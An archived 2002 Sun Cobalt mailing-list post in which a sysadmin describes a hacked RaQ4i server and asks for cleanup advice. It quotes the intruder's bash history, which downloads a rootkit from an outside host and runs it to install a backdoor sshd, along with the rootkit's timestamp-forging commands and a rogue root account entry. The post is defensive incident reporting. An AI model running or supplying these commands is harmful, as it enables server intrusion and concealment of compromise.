[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-users] Root kit raq

Subject: [cobalt-users] Root kit raq
From: "Adam Knowles" <adam@xxxxxxxxxxxxxxx>
Date: Mon Dec 16 17:43:04 2002
List-id: Mailing list for users to share thoughts on Sun Cobalt products. <cobalt-users.list.cobalt.com>

Hi,

Wondering if any1 has time to help with a hacked raq? I'm not the most
experienced sysadmin, so hopefully this can be some good learning for
me, if anyone's willing to share! Apologies for the long email, but if
any1 can read it I'd appreciate it soo much :)

It?s a Raq4i 512mb. It got hacked through the flawed SHP package Sun
shipped. I hadn?t yet applied the SHP-remove package.

You'll see the extent of the break-in later, but the only actual symptom
is mail sent using my server as SMTP never arrives. Local user's mail is
delivered OK. SMTP doesn't give errors; it accepts mail but doesn't
deliver it.

The hack happened Monday morning at 05.00. Someone got in and executed
the following, taken from BASH history (why didn't they clean this up?):

------------------------ START SNIP -----------------------------

{.{bash_history,nsr},b{in,oot},dev,etc,gmon.out,home,l{ib,ost+found},mnt
,nsr,opt,proc,root,s{bin,etup},tmp,usr,var$
hostname
cd /usr/sbin
mkdir tmp
cd tmp
pwd
wget http://www.tk-pttuntex.com/~zen/file/tutorial/rkid.tar.gz
tar -zxf rkid.tar.gz
cd rkid
./setup angina 35353
exit
------------------------ END SNIP -----------------------------

So they got in to the system, then downloaded rkid.tar.gz. This is a
root kit. I downloaded it myself and it calls itself: "shkit-v4-internal
release 2002". Amongst other things, there?s three files infected with a
couple of viruses: Linux.Lion.Worm and Trojan.Linux.Hacktop. I know this
since Norton told me when I downloaded the rkid.tar.gz to my Windows PC.
Is there anything I can do about these viruses?

The kit installed a new sshd, running on port 35353 with the pass
'angina'. 

I tried this:
/sbin/ipchains -A input -j DENY -p tcp -l -s 0.0.0.0/0 -d
my.servers.ip.address/32 35353

I added the ipchains line to the bottom of rc.local to make sure it
carries over reboots. 

That stopped telnet and SSH on port 35353 from working. Telnet's
normally disabled, but had mysteriously become enabled. I disabled it
again.

I've stopped access to the hacker's own SSH, and changed the password
for admin and root on my 'real' SSH. Is that enough to stop the
immediate threat? Or will they have access to my new passwords somehow?

I got the chkrootkit software to check other stuff.
Notable results:

[root chkrootkit-0.37]# ./chkrootkit

Checking `ifconfig'... INFECTED
Checking `login'... INFECTED
Searching for t0rn's v8 defaults... Possible t0rn v8 (or variation)
rootkit installed
Searching for Showtee... Warning: Possible Showtee Rootkit installed

I installed Portsentry 2. Do I need to add that to my rc.local to make
sure it starts up on reboot?

Found in /etc/passwd & /etc/shadow:
sbin:x:0:0::/sbin/services:/bin/bash

Seemed to be a user called ?sbin? with root privileges?  Got rid of it.
Should I have done this another way with ?userdel? or something?  Do I
need to restart anything for these changes to be noticed?

System logs aren?t being generated. How can I sort that? Syslogd reports
it's already running.

The kit added these lines to rc.sysinit. I removed them, but what did
they do?
 
# Xntps (NTPv3 daemon) startup..
/usr/sbin/xntps -q

And finally..here's all the files the kit backdoor'd:

------------- START SNIP ----------------
# time change bitch

touch -acmr /sbin/ifconfig ifconfig
touch -acmr /bin/ps ps
touch -acmr /bin/ls ls
touch -acmr /bin/login login
touch -acmr /bin/netstat netstat
touch -acmr /usr/bin/find find
touch -acmr /usr/bin/top top
touch -acmr /usr/sbin/lsof lsof
touch -acmr /sbin/syslogd syslogd
touch -acmr /usr/bin/slocate slocate
touch -acmr /usr/bin/dir dir
touch -acmr /usr/bin/md5sum md5sum
touch -acmr /usr/bin/pstree pstree

echo ${RED} baga mare PuiDeDraC jajajaj !!! PuiDeDraC Iz Hackerz!!!

------------- END SNIP --------------------

It looks like the damage is pretty serious. I've taken an SQL backup of
the mySQL databases on the server, plus tarballed up the /home/sites
directory. If I clean the latter with Norton, order a rebuild from my
datacentre, then upload everything back..is that the best way forward?

And did this really all happen just because I didn't apply the
SHP-remove package from Sun in time?

Thanks!!

---
Adam Knowles
Freelance Developer
AC Design

Email: adam@xxxxxxxxxxxxxxx 

Disclaimer:
Please notify adam@xxxxxxxxxxxxxxx if you receive
this message in error.

This email is sent in confidence and should only be
read by the intended recipient(s). Distribution or use
of the above information by others is prohibited.
 
Adam Knowles accepts no responsibility
for damage caused by viruses passed.

Follow-Ups:
- Re: [cobalt-users] Root kit raq
  - From: Steve Werby

Prev by Date: Re: [cobalt-users] MySQL
Next by Date: [cobalt-users] Two new updates for the RaQ3
Previous by thread: [cobalt-users] Vulnerability in RaQ Server Appliances CA-2002-35 [VU#810921]
Next by thread: Re: [cobalt-users] Root kit raq

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index